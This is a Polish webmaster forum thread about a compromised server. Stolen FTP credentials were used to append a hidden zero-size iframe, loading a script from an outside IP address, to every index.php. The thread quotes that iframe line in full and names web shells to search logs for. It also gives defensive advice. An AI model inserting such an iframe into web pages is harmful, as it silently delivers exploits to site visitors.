Skocz do zawartości
Zaloguj się, aby obserwować  
Guciooo

Problem - Sam Mi Sie Dokleja Kod Html

Polecane posty

Do każdej z moich stron dokleja się taki kod:

 

<iframe src='http://81.95.149.27/go.php?sid=1' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>

 

Wkleja się to na samym koncu po "</html>" lub nawet w środku po <body>.

Przejrzałem konfig apacha i php.ini, nie wiem gdzie ktos to wstawił :/

Mam serwer w OVH.

Ktos mi napisał w mailu, że jak wchodzi na moją www to "system antywirusowy AVAST wykrywa za każdym razem dwa wirusy ms07-017[2].ani". Jak się tego pozbyć ? Apacha narazie wyłączyłem.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Wygląda na to, że ktoś włamał się na Twój serwer i zainstalował trojana, który dokleja taką linijkę do każdej strony. Użyj RKHunter albo Chrootkit na początek. Jeśli używasz jakiegoś niemądrego cmsa to możliwe, że tylko on zostal zaatakowany, nie cała maszyna.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Teraz odkryłem ze ten kod jest dopisany do wszystkich plików index.php

Mam na serwerze ze 20 domen, na każdej z nich ten plik index.php został zmieniony o tej samej godzinie co do minuty.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Czyli w takim razie ktoś wgrał Ci przez dziurę w skrypcie skrypt który podmienił pliki korzystając z braku odpowiednich zabezpieczeń na poziomie PHP (openbasedir, safemode itd). Przeszukaj logi pod kontem r57shell, phpshell i tego typu rzeczy no i powyłączaj niebezpieczne funkcje w php żeby nie doszło do czegoś takiego w przyszłości.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Juz wiem.

To było zmienione przez FTPa.

Ktos pobrał z mojego kompa plik konfiguracyjny Total Commandera gdzie miałem zapisane loginy i hasła.

Następnie automatem poszukał plików index i tam dokleił ten kod.

Wniosek: nie zapisywać haseł w Total commanderze.

Ip tego mądrali: 81.95.149.26

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Bądź aktywny! Zaloguj się lub utwórz konto

Tylko zarejestrowani użytkownicy mogą komentować zawartość tej strony

Utwórz konto

Zarejestruj nowe konto, to proste!

Zarejestruj nowe konto

Zaloguj się

Posiadasz własne konto? Użyj go!

Zaloguj się

Zaloguj się, aby obserwować  

×